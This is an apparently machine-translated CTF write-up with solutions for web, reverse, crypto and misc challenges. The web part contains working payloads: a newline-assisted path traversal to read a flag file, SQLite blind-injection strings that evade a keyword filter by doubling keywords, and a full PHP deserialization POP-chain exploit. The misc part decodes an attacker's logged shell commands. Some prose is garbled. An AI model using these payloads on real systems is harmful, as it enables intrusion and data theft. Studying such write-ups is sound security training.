Web

Ancient characteristics

The newline character bypasses the first and last characters of the regular line Add directory traversal to read files

/?file=hint/hint.txt%0a%0a%0a../../../../../../flag

justlogin_web

sqlite Inject Filtering can be bypassed by double writing I was in a hurry and didn't make it clear sqlite The table structure , It's not good to write blind notes by yourself , Think about writing sql tamper The double writing of Nervous and failed to write Still have time to practice writing scripts I always change the previous script It could have been mixed up web ak
sqlite There is one sqlite_master The table stores the creation of the library table sql sentence , Look up this statement first , Then normal blind injection is OK

' oorr substr((sselectelect grgroupoup_coonncat(sql) frfromom sqlite_maasster),{},1)>'{
    }' -- 

' oorr substr((sselectelect grogroupup_coonncat(flaggg) frfromom flaggghere),{},1)>'{
    }' -- 

Safepop

This question is mixed with three blood
Pop The chain idea is class B -> class A::__get -> class Fun::__call -> class Test::getFlag

Exp:

<?php
class Fun{
    
    private $func;
    public function __construct(){
    
    $this->func = [new Test,'getFlag'];
    }
}

class Test{
    
    public function getFlag(){
    
        //system("cat /flag?");
    }
}

class A{
    
    public $a;
}

class B{
    
    public $p;
}

$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$b->p = "c";

echo base64_encode(serialize($b));

To prevent private attribute invisible characters from disappearing during copying , Choose to generate base64 And then burp Modify the number of object attributes in , and urlencode Keep invisible characters

Payload：

/?pop=%4f%3a%31%3a%22%42%22%3a%32%3a%7b%73%3a%31%3a%22%70%22%3b%73%3a%31%3a%22%63%22%3b%73%3a%31%3a%22%61%22%3b%4f%3a%31%3a%22%41%22%3a%31%3a%7b%73%3a%31%3a%22%61%22%3b%4f%3a%33%3a%22%46%75%6e%22%3a%32%3a%7b%73%3a%39%3a%22%00%46%75%6e%00%66%75%6e%63%22%3b%61%3a%32%3a%7b%69%3a%30%3b%4f%3a%34%3a%22%54%65%73%74%22%3a%30%3a%7b%7d%69%3a%31%3b%73%3a%37%3a%22%67%65%74%46%6c%61%67%22%3b%7d%7d%7d%7d

RE

The simplest reverse

Every letter +50 Compare with the target 40 Characters

Code

s=[0x76, 0x73,0x85, 0x75, 0x86, 0x78, 0xAD, 0x6B, 0x97, 0x68, 0x98,0x67,0x64,0x64,0x62, 0x97, 0x68, 0x98, 0x6B,0x6B, 0x96,
   0x67, 0x62, 0x69, 0x95, 0x96, 0x65, 0x96, 0x6A, 0x69,0x69,0x65, 0x66, 0x97, 0x68, 0x98, 0x6A, 0x95, 0x68, 0x0AF]
print(len(s))
flag=""
for i in s:
    flag+=chr(i-50)
print(flag)

Crypto

decode_and_decode

base64 32 Loop decoding
22 After decoding for times, we get flag

MISC

site_log

An audit of the logs found that there were some errors evil.php The ginseng attack The following parameter is ascii code Will all attack Transfer parameter record , And transcode the command used by the attacker

<?php
echo(chr(108).chr(115));
echo("\r\n");
echo chr(99).chr(100).chr(32).chr(47);
echo("\r\n");
echo chr(108).chr(115);
echo("\r\n");
echo chr(99).chr(97).chr(116).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(119).chr(104).chr(111).chr(97).chr(109).chr(105);
echo("\r\n");
echo chr(122).chr(105).chr(112);
echo("\r\n");
echo chr(122).chr(105).chr(112).chr(32).chr(45).chr(114).chr(80).chr(32).chr(104).chr(101).chr(104).chr(101).chr(104).chr(101).chr(50).chr(51).chr(51).chr(95).chr(73).chr(103).chr(111).chr(116).chr(114).chr(111).chr(111).chr(116).chr(65281).chr(32).chr(102).chr(108).chr(97).chr(103).chr(46).chr(122).chr(105).chr(112).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(114).chr(109).chr(32).chr(102).chr(108).chr(97).chr(103);
echo("\r\n");
echo chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(73).chr(32).chr(65).chr(77).chr(32).chr(82).chr(79).chr(79).chr(84).chr(33).chr(33).chr(33).chr(33).chr(34);
echo("\r\n");

Use the compressed password in the command to decompress But binary view found that there were control characters that could not be entered in the password , Direct pasting is invalid

Use python Script decompression

import zipfile
zfile = zipfile.ZipFile("flag.zip")
s="hehehe233_Igotroot"+chr(0xFF01)
zfile.extractall(pwd=s.encode("utf-8"))

obtain flag